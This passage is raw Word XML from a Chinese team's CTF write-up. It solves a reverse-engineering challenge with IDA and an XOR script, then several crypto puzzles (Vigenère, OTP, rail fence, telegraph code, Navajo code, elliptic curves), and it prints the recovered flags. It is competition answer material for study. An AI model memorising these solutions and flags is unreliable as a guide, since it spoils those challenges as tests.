      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>("%c", c[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>return 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4AE86E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.</w:t>
      </w:r>
      <w:proofErr w:type="gram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?.s.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9A1E2A" w14:textId="6476C8EF" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri (正文）" w:hAnsi="Calibri (正文）" w:cs="Calibri (正文）" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri (正文）" w:hAnsi="Calibri (正文）" w:cs="Calibri (正文）" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解题：刘阳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1284282C" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri (正文）" w:hAnsi="Calibri (正文）" w:cs="Calibri (正文）" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解压文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="72D11603" wp14:editId="5A465D49">
            <wp:extent cx="5270500" cy="36537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DDA6" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现是.s后缀，说明此时文件处于编译阶段，可以通过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转为.exe文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431515F3" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用VSC打开文件发现最后有提示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的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF7F3CE" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="58759E72" wp14:editId="334C6EF4">
            <wp:extent cx="5266690" cy="3127375"/>
            <wp:effectExtent l="0" t="0" r="635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E839" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在文件所在的文件夹打开终端，输入如下指令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE9A9FF" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E"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-c test1.s -o test1.o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B8CEE" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E"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test1.o -o test1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA5283" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="164963EE" wp14:editId="188B5A69">
            <wp:extent cx="5271135" cy="3615055"/>
            <wp:effectExtent l="0" t="0" r="1905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5371" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将.exe拖进</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查壳工具</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现没有壳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A9E699" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3518236B" wp14:editId="7A139F54">
            <wp:extent cx="5270500" cy="307213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5F89" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放入IDA（32位），查看主函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DF072" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E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5DD44317" wp14:editId="331EA0A6">
            <wp:extent cx="18288000" cy="10868025"/>
            <wp:effectExtent l="0" t="0" r="0" b="1333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86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E31E9" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>注意到特殊的函数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()，点进去查看发现与flag相关的程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3905CB3C" wp14:editId="2E5288DA">
            <wp:extent cx="5266690" cy="3129915"/>
            <wp:effectExtent l="0" t="0" r="635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9215" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析程序，发现只要把v1的所有字符跟v3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异或就可以得到v2，就是flag，写一个程序enc = [ 0x2A, 0x37, 0x37,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A12AF" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x27, 0x30,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBA25C" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x22, 0x1F, 0x0C,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275074A5" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x01, 0x55,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5497B3E2" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x55, 0x54, 0x3B,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADCCC0D" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x27, 0x30,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638CFE97" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x22, 0x3B, 0x10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330FC7F7" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x0C, 0x55,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7711CA" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x17, 0x3B, 0x55,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F26207" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x17, 0x3B,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA772E6" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x01, 0x1E, 0x17,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF988D" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x10, 0x19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABC3F80" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DCE905" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">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range(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(enc)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE41E49" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">flag += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(enc[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 ^ 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6ABC93" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(flag)即可得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB60F2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E0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>CRYPTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC2E362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signin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7199D44E" w14:textId="3E84106A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解题：陈亮（解出第一封信的密文），祖煜（写Python脚本解出flag）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F972B1" w14:textId="77777777" w:rsidR="0063350A" w:rsidRDefault="0063350A" w:rsidP="0063350A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据题目先在网上寻找解第一个密文的解密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B1CE7D" w14:textId="77777777" w:rsidR="0063350A" w:rsidRDefault="0063350A" w:rsidP="0063350A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后发现是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vigenere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B513F" w14:textId="77777777" w:rsidR="0063350A" w:rsidRDefault="0063350A" w:rsidP="0063350A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在密码学世界中，有一个有趣的类比：密文就像是1，而秘</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>则像是0。这象征着密文看似简单的一面，但正是通过密文和加密秘</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>的复杂组合形成了强大的保护屏障。无论是古代的对称加密还是现代的非对称加密，这种“1和0”的关系贯穿了密码学的发展。在广泛使用的加密技术中，一次性密码（OTP）技术特别受欢迎。OTP 独特之处在于它是临时和独特的，每个密码只能使用一次，在信息传输中提供了额外的安全性。在这个动态变化的密码宇宙中，OTP 像一颗流星，瞬间掠过，留下一串看似不规则的密码，以保护数据的安全导航。附言：第二封信的密码是13d16r25a3g1o12n。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6578D4CC" w14:textId="77777777" w:rsidR="0063350A" w:rsidRDefault="0063350A" w:rsidP="0063350A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后通过OTP可得知要将第二封信转为</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制再异或</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后就是写python：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B898BA9" w14:textId="77777777" w:rsidR="0063350A" w:rsidRDefault="0063350A" w:rsidP="0063350A">
      <w:pPr>
        <w:pStyle w:val="HTML0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 xml:space="preserve">import  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t>libnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">key = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:t>dr@gon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 xml:space="preserve">ciphertext = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6897BB"/>
        </w:rPr>
        <w:t>0x66617b45634d5f306b5f745f41596379747d6c6757313065745f70636601011f353f5e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6897BB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t>a = ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>#a = libnum.s2n(ciphertext)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t>b = libnum.s2n(key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:br/>
        <w:t>c = a ^ b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(c)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:br/>
        <w:t>d = libnum.n2s(c)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(d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67887A23" w14:textId="3BA92AFC" w:rsidR="0063350A" w:rsidRPr="0063350A" w:rsidRDefault="0063350A" w:rsidP="0063350A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0063350A">
        <w:t>fa{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0063350A">
        <w:t>EcM_0k_t_AYcyt}lgW10et_pcfes_RP0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B768095" w14:textId="0AEEC788" w:rsidR="0063350A" w:rsidRDefault="0063350A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最后根据题干再用篱笆密码（栅栏密码）w型，偏移量为2，得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056972B1" w14:textId="740281DF" w:rsidR="0063350A" w:rsidRPr="0063350A" w:rsidRDefault="0063350A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3350A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flag{WE1c0Me_t0_kp_ctf_eAsY_cRyPt0}</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3572ACE6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CRYPTO1921</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30483EBA" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题：陈亮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B31C5" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先出来一段摩斯电码，将其翻译得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1485C" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:t>1311/0615/0338/3127/4436/0234/2598/1807/6424/1633/3159/0362/5714/3992/0138/2589/7456/0441/0433/1311/6153/0467/0637/2232/2686/0976/2871/2639/4842/1633/0059/1633/1653/0059/0360/0433/1633/0362/4432/0554/4885/0005/1633/1653/1633/0005/0433/0362/4432</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在网上寻找发</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现像</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中文电码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D19337" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r w:rsidRPr="00235B56">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="221D0644" wp14:editId="4E862489">
            <wp:extent cx="3524276" cy="2495568"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1151987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87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76" cy="24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7BC0" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>翻译后发现确实是</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00235B56">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B3480B4" wp14:editId="783A2033">
            <wp:extent cx="3105173" cy="2428893"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2092008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08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B56">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00235B56">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68F2482D" wp14:editId="31C7C5BC">
            <wp:extent cx="3062310" cy="1471623"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="2112100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004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2310" cy="14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4C45" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>将其坐标代入得到密码解包获得第二个电报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3AC89" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>需要将“</w:t>
      </w:r>
      <w:r w:rsidRPr="00235B56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>上海已不安全，請即刻前往嘉興</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BEE9D2" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>转为中文电码再转为摩斯电码最后32位md5位得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A29CB1E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CRYPTO1939</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FDAA34" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题：陈亮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E77580B" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00235B56">
        <w:t>Request fire support. We have target at 119, baker 15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73797EF3" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>发现是&lt;&lt;风语者&gt;&gt;里的一句话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17083248" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRPr="00235B56" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后猜解密是根据里面的解密在网上到处找</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307DAD54" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260534C3" wp14:editId="30C5E12D">
            <wp:extent cx="5274310" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="138611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39B1" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后在这个网站上找到了，对照左边的密码，一个一个对应就可以了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF17A33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2023</w:t>
      </w:r>
      <w:proofErr w:type="gram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四</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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省联考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9E9D8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解题：祖煜</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC19B42" w14:textId="1AC3BB31" w:rsidR="00B2405E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椭圆加密，根据题目信息得到是椭圆加密的题目，去网上搜索博客，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看相应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知识点 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:anchor="more" w:history="1">
        <w:r w:rsidR="00B2405E" w:rsidRPr="006D6F4F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https://mrl64.github.io/2022/02/18/%E3%80%90hgame-week4%E3%80%91write-up/#more</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FE0E7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ECD42F9" w14:textId="1DAEDDE2" w:rsidR="00B2405E" w:rsidRPr="00B2405E" w:rsidRDefault="00B2405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544AE" wp14:editId="2F565528">
            <wp:extent cx="5274310" cy="5928715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1386112069" name="图片 138611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971B" w14:textId="7097FFBC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理</w:t>
      </w:r>
